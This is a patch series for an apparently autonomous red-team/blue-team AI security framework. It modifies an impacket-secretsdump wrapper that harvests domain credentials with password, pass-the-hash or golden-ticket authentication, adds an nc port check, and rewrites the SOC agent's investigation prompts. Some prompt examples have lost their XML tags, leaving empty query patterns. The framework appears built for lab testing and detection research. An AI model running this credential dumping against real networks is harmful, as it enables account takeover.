@@ """Factory for creating red team agents with presets.""" +import time + import dreadnode as dn from dreadnode.agent import Agent from dreadnode.agent.events import ( @@ -36,37 +38,95 @@ "redteam/agents/system_instructions.md.jinja" ) +# Event deduplication state +_last_event_times: dict[str, float] = {} +_last_step_number: int | None = None +_DEBOUNCE_WINDOW = 0.1 # 100ms debounce window + + +def reset_event_tracking(): + """Reset event tracking state for a new agent run.""" + global _last_event_times, _last_step_number + _last_event_times = {} + _last_step_number = None + + +def _should_log_event(event_type: str) -> bool: + """Check if event should be logged (debounce rapid duplicates).""" + now = time.time() + last_time = _last_event_times.get(event_type, 0) + if now - last_time < _DEBOUNCE_WINDOW: + return False + _last_event_times[event_type] = now + return True + async def log_step_start(event: StepStart): - """Log step start for debugging.""" - logger.info(f"📍 Step started: step_number={getattr(event, 'step_number', '?')}") + """Log step start for debugging - only when step number is meaningful.""" + global _last_step_number + step_num = getattr(event, "step_number", None) + + # Skip if no real step number or if it's the same as last logged step + if step_num is None or step_num == _last_step_number: + return + + if not _should_log_event("step_start"): + return + + _last_step_number = step_num + logger.info(f"📍 Step {step_num} started") async def log_generation_end(event: GenerationEnd): - """Log generation end with details.""" - logger.info("📍 Generation ended") - # Log the message if available - if hasattr(event, "message") and event.message: - msg = event.message - logger.info(f"📍 Message type: {type(msg).__name__}") - if hasattr(msg, "content"): - logger.info(f"📍 Message content (first 500 chars): {str(msg.content)[:500]}") - if hasattr(msg, "tool_calls") and msg.tool_calls: - logger.info(f"📍 Tool calls requested: {[tc.name for tc in msg.tool_calls]}") + """Log generation end - only when there's meaningful content.""" + # Skip empty/spurious generation events + if not hasattr(event, "message") or not event.message: + return + + msg = event.message + has_content = hasattr(msg, "content") and msg.content and str(msg.content).strip() + has_tool_calls = hasattr(msg, "tool_calls") and msg.tool_calls + + # Only log if there's actual content or tool calls + if not has_content and not has_tool_calls: + return + + if not _should_log_event("generation_end"): + return + + # Log concise summary + if has_tool_calls: + tool_names = [tc.name for tc in msg.tool_calls] + logger.info(f"🤖 Agent requesting tools: {tool_names}") + elif has_content: + content_preview = str(msg.content)[:200].replace("\n", " ") + logger.info(f"🤖 Agent: {content_preview}...") async def log_agent_error(event: AgentError): - """Log agent errors.""" + """Log agent errors - only real errors, not spurious SDK events.""" error = getattr(event, "error", None) + # Only log if there's an actual error (SDK emits AgentError with None frequently) + if error is None: + return # Silently ignore spurious events + logger.error(f"🚨 Agent error: {error}") - if hasattr(event, "traceback"): + if hasattr(event, "traceback") and event.traceback: logger.error(f"🚨 Traceback: {event.traceback}") async def log_agent_end(event: AgentEnd): - """Log agent end.""" + """Log agent end - only when there's a meaningful stop reason.""" stop_reason = getattr(event, "stop_reason", None) - logger.info(f"📍 Agent ended: stop_reason={stop_reason}") + + # Skip spurious end events with no stop reason + if stop_reason is None: + return + + if not _should_log_event("agent_end"): + return + + logger.info(f"🏁 Agent ended: {stop_reason}") async def log_tool_usage(event: ToolStart): @@ -151,6 +211,9 @@ def create_redteam_agent( Returns: Configured agent ready for penetration testing operations """ + # Reset event tracking for fresh agent run + reset_event_tracking() + # Initialize toolsets network_tools = NetworkEnumerationTools() network_tools.set_state(state) diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index b45e5b7c..fc8baa68 100644 --- a/src/ares/tools/blue/actions.py +++ b/src/ares/tools/blue/actions.py @@ -26,92 +26,146 @@ def set_state(self, state: InvestigationState): async def complete_investigation( self, summary: str, - attack_synopsis: str, - recommendations: list[str], - confidence: str, - affected_hosts: list[str], - affected_users: list[str], - attack_timeframe: str, + attack_synopsis: str | None = None, + recommendations: list[str] | None = None, ) -> str: """Complete the investigation and signal report generation. - REQUIRED before calling: - 1. Must have transitioned through lateral stage - 2. Must have investigated at least one host - 3. Must provide specific affected hosts/users - 4. Must provide attack timeframe + Call this when you have: + - Answered the key questions about the alert + - Recorded evidence for your findings + - Built a timeline of events + - Identified affected hosts/users Args: - summary: Executive summary (2-3 sentences). - attack_synopsis: Detailed description of the attack chain. - recommendations: List of recommended actions. - confidence: Overall confidence level (high/medium/low with explanation). - affected_hosts: List of hosts involved in the attack (IPs or hostnames). - affected_users: List of user accounts involved. - attack_timeframe: Time range of the attack (e.g., "2024-01-15 14:30-15:45 UTC"). + summary: Executive summary of the investigation including: + - What attack/activity was detected + - Key findings and evidence + - Affected hosts and users + - Confidence level (high/medium/low) + attack_synopsis: Narrative describing the attack chain chronologically. + Should include specific hostnames, usernames, IPs, and timestamps. + Explains how the attacker progressed through the attack. + recommendations: List of recommended actions to take. Should include + both immediate response actions and long-term improvements. + Check the alert's 'response' annotation for expert guidance. Returns: - Confirmation message or error if validation fails. + Confirmation message. Example: >>> await complete_investigation( - ... summary="Detected Kerberoasting attack targeting service accounts.", - ... attack_synopsis="Attacker performed AS-REP roasting against samwell.tarly...", - ... recommendations=["Reset passwords for samwell.tarly and jeor.mormont"], - ... confidence="High - Multiple corroborating Kerberos events", - ... affected_hosts=["10.0.4.186", "WINTERFELL.north.sevenkingdoms.local"], - ... affected_users=["samwell.tarly", "jeor.mormont"], - ... attack_timeframe="2024-01-08 04:37-04:43 UTC" + ... summary="Detected Kerberoasting attack targeting service accounts. " + ... "User samwell.tarly requested TGS tickets with RC4 encryption " + ... "for multiple SPNs from host 10.0.4.186. Confidence: High.", + ... attack_synopsis="At 14:30 UTC, user samwell.tarly from 10.0.4.186 " + ... "began requesting TGS tickets for service accounts. " + ... "12 tickets requested with RC4 encryption over 5 minutes.", + ... recommendations=[ + ... "Reset service account passwords immediately", + ... "Enable AES-only Kerberos encryption", + ... "Review service account permissions" + ... ] ... ) 'Investigation completed. Report will be generated.' """ - warnings = [] - # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." - # Log stage warning but don't block + # Log stage info if self.state.stage.value not in ["lateral", "synthesis"]: - warnings.append( - f"Note: Investigation completed at '{self.state.stage.value}' stage " - f"(ideally should reach 'lateral' stage for thorough analysis)." - ) - - # Log if no hosts were investigated - if not self.state.queried_hosts and not affected_hosts: - warnings.append( - "Note: No specific hosts were investigated. Consider investigating " - "affected hosts in future investigations." - ) - - # Log warnings (but don't block completion) - for warning in warnings: - logger.warning(warning) - - # All validations passed + logger.info(f"Investigation completed at '{self.state.stage.value}' stage") + + # Store attack synopsis if provided + if attack_synopsis: + self.state.attack_synopsis = attack_synopsis + logger.info(f"Attack synopsis recorded: {attack_synopsis[:100]}...") + + # Process recommendations + if recommendations: + self.state.recommendations.extend(recommendations) + logger.info(f"Added {len(recommendations)} recommendations") + + # Auto-extract recommendations from alert annotations if none provided + if not self.state.recommendations: + alert_annotations = self.state.alert.get("annotations", {}) + response_guidance = alert_annotations.get("response", "") + if response_guidance: + # Parse numbered or bulleted steps from response + import re + + steps = re.split(r"\d+\.\s+", response_guidance) + extracted_recs = [s.strip() for s in steps if s.strip()] + if extracted_recs: + self.state.recommendations.extend(extracted_recs) + logger.info(f"Auto-extracted {len(extracted_recs)} recommendations from alert") + + # Auto-generate synopsis if not provided and we have evidence + if not self.state.attack_synopsis and self.state.evidence: + self._generate_fallback_synopsis() + + # Record completion dn.log_metric("investigation_completed", 1) dn.log_output( "completion_summary", { "summary": summary, - "attack_synopsis": attack_synopsis, - "recommendations": recommendations, - "confidence": confidence, - "affected_hosts": affected_hosts, - "affected_users": affected_users, - "attack_timeframe": attack_timeframe, + "attack_synopsis": self.state.attack_synopsis, + "recommendations": self.state.recommendations, "evidence_count": len(self.state.evidence), "timeline_events": len(self.state.timeline), "hosts_investigated": list(self.state.queried_hosts), "users_investigated": list(self.state.queried_users), + "techniques_identified": list(self.state.identified_techniques), }, ) - logger.success("Investigation completed") + logger.success(f"Investigation completed: {summary[:100]}...") return "Investigation completed. Report will be generated." + def _generate_fallback_synopsis(self) -> None: + """Generate a basic synopsis from evidence if none provided.""" + if not self.state: + return + + parts = [] + + # Get alert info + alert_name = self.state.alert.get("labels", {}).get("alertname", "Unknown alert") + severity = self.state.alert.get("labels", {}).get("severity", "unknown") + starts_at = self.state.alert.get("startsAt", "") + + parts.append(f"{severity.upper()} alert: {alert_name}") + + if starts_at: + parts.append(f"Alert triggered at {starts_at}.") + + # Add technique info + if self.state.identified_techniques: + techniques = ", ".join(list(self.state.identified_techniques)[:3]) + parts.append(f"MITRE techniques identified: {techniques}.") + + # Add host/user info + if self.state.queried_hosts: + hosts = ", ".join(list(self.state.queried_hosts)[:3]) + parts.append(f"Hosts involved: {hosts}.") + + if self.state.queried_users: + users = ", ".join(list(self.state.queried_users)[:3]) + parts.append(f"Users involved: {users}.") + + # Add evidence summary + if self.state.evidence: + parts.append(f"{len(self.state.evidence)} evidence items collected.") + # Get highest-level evidence + high_level = [e for e in self.state.evidence if e.pyramid_level.value >= 5] + if high_level: + parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.") + + self.state.attack_synopsis = " ".join(parts) + @dn.tool() # type: ignore[untyped-decorator] async def escalate_investigation( diff --git a/src/ares/tools/blue/investigation.py b/src/ares/tools/blue/investigation.py index 187ed394..3dd7f841 100644 --- a/src/ares/tools/blue/investigation.py +++ b/src/ares/tools/blue/investigation.py @@ -32,14 +32,20 @@ class InvestigationTools(Toolset): # type: ignore[misc] Attributes: state: Current investigation state being managed. + mitre_client: MITRE ATT&CK client for technique lookups. """ state: InvestigationState | None = None + mitre_client: MITREAttackClient | None = None def set_state(self, state: InvestigationState): """Set the investigation state (called by orchestrator).""" self.state = state + def set_mitre_client(self, client: MITREAttackClient): + """Set the MITRE client for technique lookups.""" + self.mitre_client = client + @dn.tool_method # type: ignore[untyped-decorator] def record_evidence( self, @@ -116,6 +122,8 @@ def record_evidence( if mitre_techniques: self.state.identified_techniques.update(mitre_techniques) + # Look up technique names and tactics + self._resolve_technique_metadata(mitre_techniques) dn.log_output(f"evidence_{evidence_id}", ev.to_dict()) dn.log_metric("evidence_count", 1, mode="count") @@ -127,6 +135,24 @@ def record_evidence( return evidence_id + def _resolve_technique_metadata(self, technique_ids: list[str]) -> None: + """Look up and cache technique names and tactics.""" + if not self.state or not self.mitre_client: + return + + for tech_id in technique_ids: + # Skip if already resolved + if tech_id in self.state.technique_names: + continue + + technique = self.mitre_client.get_technique(tech_id) + if technique: + self.state.technique_names[tech_id] = technique.name + self.state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + self.state.identified_tactics.add(technique.tactic) + logger.debug(f"Resolved technique {tech_id}: {technique.name} ({technique.tactic})") + @dn.tool_method # type: ignore[untyped-decorator] def add_timeline_event( self, diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py index 4773c0be..a81c8f4a 100644 --- a/src/ares/tools/red/network.py +++ b/src/ares/tools/red/network.py @@ -193,6 +193,27 @@ def set_state(self, state: RedTeamState) -> None: """Set the operation state for this toolset.""" self.state = state + def _check_smb_connectivity(self, target: str, timeout_seconds: int = 5) -> tuple[bool, str]: + """Check if SMB port 445 is reachable on target. + + Args: + target: Target IP address + timeout_seconds: Connection timeout for nc command + + Returns: + Tuple of (is_reachable, error_message) + """ + cmd = ["nc", "-zv", "-w", str(timeout_seconds), target, "445"] + try: + # AWS SSM has a minimum timeout of 30 seconds + ssm_timeout = max(30, timeout_seconds + 5) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=ssm_timeout) + if returncode == 0: + return True, "" + return False, f"SMB port 445 not reachable: {stderr or stdout}" + except Exception as e: + return False, f"Connectivity check failed: {e}" + @dn.tool_method def secretsdump( self, @@ -201,8 +222,11 @@ def secretsdump( password: str | None = None, hash: str | None = None, domain: str | None = None, + dc_ip: str | None = None, no_pass: bool = False, - timeout_minutes: int = 10, + timeout_minutes: int = 3, + connection_timeout: int = 30, + skip_connectivity_check: bool = False, ) -> str: """ Extract secrets using impacket-secretsdump for credential harvesting. @@ -217,18 +241,32 @@ def secretsdump( password: Password for the username (optional) hash: NTLM hash for pass-the-hash authentication (optional) domain: Domain name (optional, can be inferred) + dc_ip: Domain controller IP address (recommended for DC targets to avoid DNS issues) no_pass: If True, use Kerberos golden ticket authentication - timeout_minutes: Maximum time to spend dumping (default: 10) + timeout_minutes: Maximum time to spend dumping (default: 3) + connection_timeout: Timeout for initial SMB connection in seconds (default: 30) + skip_connectivity_check: Skip the SMB port check (default: False) Returns: Extracted credentials including NTLM hashes, Kerberos keys, and secrets Example: >>> secretsdump("192.168.1.100", "Administrator", password="P@ssw0rd") # pragma: allowlist secret - >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN") + >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN", dc_ip="192.168.1.100") >>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket """ - cmd = ["impacket-secretsdump"] + # Pre-check SMB connectivity to fail fast + if not skip_connectivity_check: + is_reachable, error_msg = self._check_smb_connectivity(target) + if not is_reachable: + return f"[!] Target {target} is not reachable on SMB port 445. {error_msg}" + + # Use timeout command to enforce connection-level timeout + cmd = ["timeout", str(connection_timeout), "impacket-secretsdump"] + + # Add dc-ip flag if provided (helps avoid DNS resolution hangs) + if dc_ip: + cmd.extend(["-dc-ip", dc_ip]) if password and domain: target_string = f"{domain}/{username}:{password}@{target}" @@ -257,6 +295,10 @@ def secretsdump( stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60) + # Check for timeout exit code (124 from timeout command) + if returncode == 124: + return f"[!] Secretsdump timed out after {connection_timeout}s connecting to {target}. Target may be unreachable or credentials invalid." + logger.info(f"[*] Secretsdump completed for {target}") return stdout or stderr or f"Secretsdump returned code {returncode}" diff --git a/templates/agent/initial_alert_prompt.md.jinja b/templates/agent/initial_alert_prompt.md.jinja index 6c23cb89..3293af07 100644 --- a/templates/agent/initial_alert_prompt.md.jinja +++ b/templates/agent/initial_alert_prompt.md.jinja @@ -104,11 +104,25 @@ mcp__grafana__query_loki_logs( If no results, try broader queries but ALWAYS use the time range above. **CRITICAL**: After EVERY query (whether it returns results or not), you MUST: -1. If results found: Call record_evidence() for EACH user/host/IP/process/finding +1. If results found: **PARSE THE JSON** and call record_evidence() for EACH user/host/IP/process found 2. If NO results: Document this and either try a broader query OR move forward with get_combined_questions() 3. DO NOT query multiple times without calling record_evidence() or get_combined_questions() -**YOU ARE STUCK IN A LOOP IF**: You make 3+ queries without calling record_evidence() or get_combined_questions() +**YOU ARE STUCK IN A LOOP IF**: You make 2+ queries without calling record_evidence() + +## How to Parse Query Results + +Loki returns JSON like this: +```json +{"line": "{\"computer\":\"winterfell.north.sevenkingdoms.local\", \"event_data\":\"robb.stark10.0.4.186\"}"} +``` + +**EXTRACT AND RECORD:** +- `computer` field → record_evidence(evidence_type="hostname", value="winterfell...") +- `TargetUserName` from event_data → record_evidence(evidence_type="user", value="robb.stark") +- `IpAddress` from event_data → record_evidence(evidence_type="ip", value="10.0.4.186") + +**DO NOT** re-run the same query. **DO** parse results and extract IOCs. --- @@ -161,12 +175,10 @@ If no results, try broader queries but ALWAYS use the time range above. 18. ☐ Call transition_stage("synthesis") ### Stage 4: SYNTHESIS -19. ☐ Call complete_investigation() with ALL required fields - -**DO NOT complete the investigation until you have:** -- Identified specific affected hosts (including ALL domain controllers) -- Identified ALL compromised user accounts -- Investigated precursor techniques (enumeration, credential access) -- Created a complete timeline from initial access to detected attack -- Recorded at least 5 evidence items covering the full attack chain -- Mapped the attack to multiple MITRE techniques (not just the alert technique) +19. ☐ Call complete_investigation(summary="...") with a summary of your findings + +**Complete the investigation when you have:** +- Investigated the alert and recorded evidence +- Identified affected hosts and users +- Built a timeline of events +- Can provide recommendations diff --git a/templates/agent/system_instructions.md.jinja b/templates/agent/system_instructions.md.jinja index 8f073c9a..044d99a4 100644 --- a/templates/agent/system_instructions.md.jinja +++ b/templates/agent/system_instructions.md.jinja @@ -1,6 +1,22 @@ You are Ares, an autonomous SOC investigation agent. Your mission is to investigate -security alerts and produce actionable threat intelligence through systematic, -question-driven investigation. +security alerts and produce actionable threat intelligence. + +## 🛑 CRITICAL: COMPLETE QUICKLY + +**You have LIMITED steps. Do NOT loop endlessly on queries.** + +1. Query logs (2-3 queries max) +2. Record any findings with record_evidence() +3. Call complete_investigation(summary="...") with your findings + +If queries return empty results, that IS a finding. Complete with: +``` +complete_investigation(summary="Investigated [alert]. No matching events found in logs. +Recommend continued monitoring. Confidence: Low - no data to confirm or deny.") +``` + +**ANTI-PATTERN**: Making 3+ queries without calling complete_investigation() +**CORRECT PATTERN**: Query → Record findings → Complete ## Core Investigation Philosophy @@ -95,16 +111,51 @@ The alert's `startsAt` timestamp is likely STALE. The initial prompt provides: **DO NOT skip this stage. If you only detect the final attack without precursors, your investigation is INCOMPLETE.** -### Stage 3: LATERAL (What is the SCOPE?) +### Stage 3: LATERAL (What is the SCOPE?) - CRITICAL FOR HIGH/CRITICAL ALERTS + +For HIGH and CRITICAL severity alerts, you MUST perform lateral investigation. + 1. Call get_combined_questions() for scope questions -2. Use track_host_investigation() and track_user_investigation() -3. Check these dimensions in PARALLEL: +2. Use track_host_investigation() and track_user_investigation() for EACH entity +3. **MANDATORY LATERAL QUERIES:** + +**For each user discovered:** +``` +{job=~".+"} |~ "(?i)" +``` +- What other hosts did this user access? +- What other activities did this user perform? +- Were there failed login attempts before success? + +**For each host discovered:** +``` +{job=~".+"} |~ "(?i)" +``` +- What other users logged into this host? +- What processes were executed on this host? +- What network connections were made? + +**For each IP discovered:** +``` +{job=~".+"} |~ "" +``` +- What other hosts communicated with this IP? +- What services were accessed from this IP? +- Is this IP associated with multiple users? + +4. Check these dimensions in PARALLEL: - Same host: What else is this host doing? - Same user: Where else has this user been? - Same indicators: Where else do these IOCs appear? - Same timeframe: What else happened during this window? -4. Expand or contract scope based on findings -5. Call transition_stage("synthesis") + +5. **Build a scope map:** + - List ALL compromised/affected hosts + - List ALL compromised/affected users + - Identify the attack origin point + - Identify the furthest point of lateral movement + +6. Call transition_stage("synthesis") ### Stage 4: SYNTHESIS (Generate report) 1. Call get_investigation_summary() to review findings @@ -246,7 +297,28 @@ data sources. These tools include: - Check stats before running large queries - Prefer MCP tools when available as they're more reliable than HTTP API calls -## Evidence Recording +## Evidence Recording (CRITICAL - DO NOT SKIP) + +**You MUST extract and record ALL IOCs from query results.** For EVERY finding, call record_evidence(). + +### IOC Extraction Checklist + +When you get query results, extract and record EACH of these: + +| IOC Type | What to Look For | Pyramid Level | +|----------|------------------|---------------| +| **ip** | Source IPs, destination IPs, client IPs | 2 | +| **user** | Usernames, account names, service accounts | 4 | +| **hostname** | Computer names, server names, DC names | 4 | +| **domain** | Domain names, FQDNs | 3 | +| **process** | Process names, command lines | 4 | +| **file** | File paths, file names | 4 | +| **hash** | MD5, SHA1, SHA256 hashes | 1 | +| **artifact** | Registry keys, scheduled tasks, services | 4 | +| **tool** | Attack tools (mimikatz, rubeus, etc.) | 5 | +| **technique** | MITRE ATT&CK technique ID | 6 | + +### record_evidence() Parameters For EVERY finding, call record_evidence() with: 1. evidence_type: ip, domain, hash, process, user, file, artifact, tool, technique @@ -256,14 +328,202 @@ For EVERY finding, call record_evidence() with: 5. pyramid_level: 1-6 (6 = TTP, the goal!) 6. mitre_techniques: List of technique IDs if known +### Example: Extracting IOCs from DCSync Detection + +If you find a DCSync event, record MULTIPLE evidence items: + +```python +# Record the technique (level 6 - TTP) +record_evidence( + evidence_type="technique", + value="T1003.006 - DCSync", + source="Loki query: Event 4662", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=6, + mitre_techniques=["T1003.006"] +) + +# Record the attacking user (level 4) +record_evidence( + evidence_type="user", + value="robb.stark", + source="Event 4662 SubjectUserName field", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=4, + mitre_techniques=["T1003.006"] +) + +# Record the source host (level 4) +record_evidence( + evidence_type="hostname", + value="winterfell.north.sevenkingdoms.local", + source="Event 4662 SubjectLogonId correlated with 4624", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=4, + mitre_techniques=["T1003.006"] +) + +# Record the source IP (level 2) +record_evidence( + evidence_type="ip", + value="10.0.4.186", + source="Event 4624 IpAddress field", + timestamp="2026-01-10T14:30:00Z", + pyramid_level=2, + mitre_techniques=["T1003.006"] +) +``` + +**DO NOT just record the technique - record ALL associated IOCs!** + +## Parsing Loki Query Results (CRITICAL) + +Loki returns structured JSON with embedded Windows Event data. You MUST parse these results. + +### Loki Response Structure + +Each result contains: +```json +{ + "timestamp": "...", + "line": "{\"computer\":\"hostname\", \"event_id\":4624, \"event_data\":\"...\"}", + "labels": {"host": "...", "deployment": "..."} +} +``` + +### Extracting IOCs from Results + +**Step 1: Parse the `line` field as JSON** +The `line` field contains the actual log entry with: +- `computer`: The hostname (e.g., "winterfell.north.sevenkingdoms.local") +- `event_id`: Windows Event ID +- `event_data`: XML containing user/IP/SID data +- `message`: Human-readable event description + +**Step 2: Extract from `event_data` XML** +Look for these XML patterns: +- `username` → Record as user +- `username` → Record as user +- `10.0.4.186` → Record as IP +- `hostname` → Record as hostname +- `DOMAIN` → Record as domain +- `C:\path\exe` → Record as process + +**Step 3: Extract from `labels`** +- `host`: Source hostname +- `computer`: Full FQDN +- `deployment`: Environment identifier + +### Example: Parsing a 4624 Logon Event + +If query returns: +``` +computer: winterfell.north.sevenkingdoms.local +event_data: robb.stark + 10.0.4.186 +``` + +You MUST call: +```python +record_evidence(evidence_type="hostname", value="winterfell.north.sevenkingdoms.local", ...) +record_evidence(evidence_type="user", value="robb.stark", ...) +record_evidence(evidence_type="ip", value="10.0.4.186", ...) +``` + +### Common Windows Event Fields by Event ID + +| Event ID | Key Fields to Extract | +|----------|----------------------| +| 4624 (Logon) | TargetUserName, IpAddress, WorkstationName, LogonType | +| 4625 (Failed Logon) | TargetUserName, IpAddress, FailureReason | +| 4662 (Object Access) | SubjectUserName, ObjectName, AccessMask | +| 4728/4732 (Group Add) | MemberName, TargetUserName (group), SubjectUserName | +| 4768 (TGT Request) | TargetUserName, IpAddress, ServiceName | +| 4769 (TGS Request) | TargetUserName, ServiceName, IpAddress, TicketEncryptionType | + +**ANTI-PATTERN**: Getting query results and immediately querying again without extracting IOCs +**CORRECT PATTERN**: Get results → Parse JSON → Extract each IOC → record_evidence() for each → Then query again if needed + ## Completion Criteria -Call complete_investigation() when: -1. get_combined_questions() returns no high-priority questions -2. You have TTPs identified (pyramid level 6) -3. Tactical coverage is reasonable (checked major attack phases) -4. Timeline is coherent -5. Scope is understood +Call complete_investigation(summary, attack_synopsis, recommendations) when: +1. You have investigated the alert and recorded evidence +2. You understand what happened (attack type, affected hosts/users) +3. You can provide recommendations + +### Summary Requirements + +The **summary** should include: +- What attack/activity was detected +- Key findings and affected hosts/users +- Confidence level + +### Attack Synopsis Requirements (CRITICAL) + +The **attack_synopsis** is a narrative describing the attack chain. It should: +- Describe the attack from start to finish in chronological order +- Include specific hostnames, usernames, IPs, and timestamps +- Explain how the attacker progressed (what they did first, second, etc.) +- Connect the dots between evidence pieces + +**Good Synopsis Example:** +``` +"On 2026-01-10 at 14:30 UTC, attacker from IP 10.0.4.186 began password spraying +against domain accounts. After 47 failed attempts, they successfully authenticated +as arya.stark at 14:45. Using these credentials, they accessed SYSVOL share on +DC01 at 14:52 to harvest GPP passwords. At 15:10, they executed DCSync from +workstation WS-042, extracting the krbtgt hash. Total time from initial access +to domain compromise: 40 minutes." +``` + +**Bad Synopsis Example:** +``` +"DCSync attack detected." (Too vague, no details) +``` + +### Recommendations Requirements (CRITICAL) + +The **recommendations** list should include: +1. **Extract from alert annotations**: The alert's `response` annotation contains expert-written response steps - USE THEM +2. **Add investigation-specific findings**: Based on what you discovered +3. **Prioritize by severity**: Critical actions first + +**Always check the alert annotations for:** +- `response`: Contains step-by-step remediation guidance +- `summary`: Contains concise attack description +- `description`: Contains detailed attack explanation + +Example with all three parameters: +``` +complete_investigation( + summary="Detected DCSync attack. User robb.stark executed replication requests " + "from winterfell.north.sevenkingdoms.local. NTLM hashes exfiltrated for " + "multiple domain accounts. Confidence: High based on Event 4662 correlation.", + attack_synopsis="Initial access occurred via password spray at 14:30 UTC with " + "47 failed logons against 12 accounts. Successful authentication " + "as robb.stark at 14:45. SYSVOL accessed at 14:52. DCSync executed " + "at 15:10 targeting krbtgt and Administrator accounts.", + recommendations=[ + "IMMEDIATE: Reset krbtgt password twice (10 hours apart)", + "IMMEDIATE: Reset all compromised account passwords", + "Isolate source host winterfell.north.sevenkingdoms.local", + "Block source IP at network perimeter", + "Hunt for golden ticket usage (Event 4769 with RC4)", + "Review all privileged account access in past 24 hours" + ] +) +``` + +### Timeline Building (MANDATORY) + +You MUST call add_timeline_event() for EVERY significant event discovered: +- Authentication events (successful and failed) +- Share access events +- Privilege escalation events +- Lateral movement events +- Data exfiltration indicators + +**Even if you only have the alert timestamp**, create a timeline event for it. Call escalate_investigation() if: - Active, ongoing attack detected From 9a6cbf13e10bc2995b9aaff972de2732cea6d3b1 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Sat, 10 Jan 2026 17:49:50 -0700 Subject: [PATCH 4/5] feat: add red-blue correlation engine, investigation learning tools, and query resilience **Added:** - Introduced a Red-Blue Correlation Engine for mapping red team activities to blue team detections, generating coverage metrics and detailed markdown reports (`src/ares/core/correlation.py`) - Implemented a persistence layer for storing investigation results, tracking query effectiveness, and similarity-based lookup for new alerts (`src/ares/core/persistence.py`) - Added query resilience module to provide automatic retry, time range reduction, and chunking for large queries to Loki/Prometheus backends (`src/ares/core/query_resilience.py`) - Added `LearningTools` agent toolset to expose past investigation data, effective queries, false positive patterns, and statistics to the agent (`src/ares/tools/blue/learning.py`) - Introduced workflow for generating and updating coverage badge in CI (`.github/workflows/coverage-badge.yaml`) - Added static badge for code coverage to repo (`.github/badges/coverage.svg`) - Added comprehensive test suites for correlation, learning, persistence, and query resilience modules (`tests/test_correlation.py`, `tests/test_learning.py`, `tests/test_persistence.py`, `tests/test_query_resilience.py`) **Changed:** - Extended `InvestigationOrchestrator` to persist all completed, escalated, timed out, and failed investigations for later learning and analysis - Updated query tool wrapping in `blue_factory.py` to integrate rate limiting, duplicate detection, and resilient execution via the new resilience module - Added `LearningTools` to agent toolset for blue investigations - Updated `.pre-commit-config.yaml` to exclude `tests/` from mypy type checks - Modified test workflow to output coverage as XML and upload coverage artifact for badge generation (`.github/workflows/tests.yaml`) - Updated `src/ares/tools/blue/__init__.py` to export new learning tools - Various code comments and docstrings cleaned up for clarity and conciseness **Removed:** - None --- .github/badges/coverage.svg | 16 + .github/workflows/coverage-badge.yaml | 49 ++ .github/workflows/tests.yaml | 10 +- .pre-commit-config.yaml | 1 + src/ares/agents/blue/soc_investigator.py | 102 ++- src/ares/core/correlation.py | 844 +++++++++++++++++++++++ src/ares/core/factories/blue_factory.py | 131 +++- src/ares/core/persistence.py | 843 ++++++++++++++++++++++ src/ares/core/query_resilience.py | 402 +++++++++++ src/ares/core/remote.py | 1 - src/ares/integrations/mitre.py | 3 - src/ares/main.py | 9 - src/ares/reports/redteam.py | 4 +- src/ares/tools/blue/__init__.py | 2 + src/ares/tools/blue/actions.py | 7 - src/ares/tools/blue/learning.py | 347 ++++++++++ src/ares/tools/blue/observability.py | 3 - tests/test_correlation.py | 735 ++++++++++++++++++++ tests/test_learning.py | 529 ++++++++++++++ tests/test_persistence.py | 537 ++++++++++++++ tests/test_query_resilience.py | 516 ++++++++++++++ 21 files changed, 5030 insertions(+), 61 deletions(-) create mode 100644 .github/badges/coverage.svg create mode 100644 .github/workflows/coverage-badge.yaml create mode 100644 src/ares/core/correlation.py create mode 100644 src/ares/core/persistence.py create mode 100644 src/ares/core/query_resilience.py create mode 100644 src/ares/tools/blue/learning.py create mode 100644 tests/test_correlation.py create mode 100644 tests/test_learning.py create mode 100644 tests/test_persistence.py create mode 100644 tests/test_query_resilience.py diff --git a/.github/badges/coverage.svg b/.github/badges/coverage.svg new file mode 100644 index 00000000..f9095ee3 --- /dev/null +++ b/.github/badges/coverage.svg @@ -0,0 +1,16 @@ + + + + + + + + + + + coverage + coverage + N/A + N/A + + diff --git a/.github/workflows/coverage-badge.yaml b/.github/workflows/coverage-badge.yaml new file mode 100644 index 00000000..0f1d7211 --- /dev/null +++ b/.github/workflows/coverage-badge.yaml @@ -0,0 +1,49 @@ +--- +name: 📊 Coverage Badge + +on: + workflow_run: + workflows: ["🐍 Python Tests"] + types: + - completed + branches: + - main + +permissions: + contents: write + +jobs: + badge: + name: 📊 Generate coverage badge + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + + steps: + - name: Set up git repository + uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1 + + - name: Download coverage artifact + uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 + with: + name: coverage-report + run-id: ${{ github.event.workflow_run.id }} + github-token: ${{ secrets.GITHUB_TOKEN }} + + - name: Set up Python + uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0 + with: + python-version: "3.12" + + - name: Generate coverage badge + run: | + pip install "genbadge[coverage]" + mkdir -p .github/badges + genbadge coverage -i coverage.xml -o .github/badges/coverage.svg + + - name: Commit badge + run: | + git config --local user.email "github-actions[bot]@users.noreply.github.com" + git config --local user.name "github-actions[bot]" + git add .github/badges/coverage.svg + git diff --staged --quiet || git commit -m "Update coverage badge [skip ci]" + git push diff --git a/.github/workflows/tests.yaml b/.github/workflows/tests.yaml index 0ff24b80..9f83af99 100644 --- a/.github/workflows/tests.yaml +++ b/.github/workflows/tests.yaml @@ -55,4 +55,12 @@ jobs: - name: Run tests with coverage run: | - pytest --cov=src --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist + pytest --cov=src --cov-report=xml 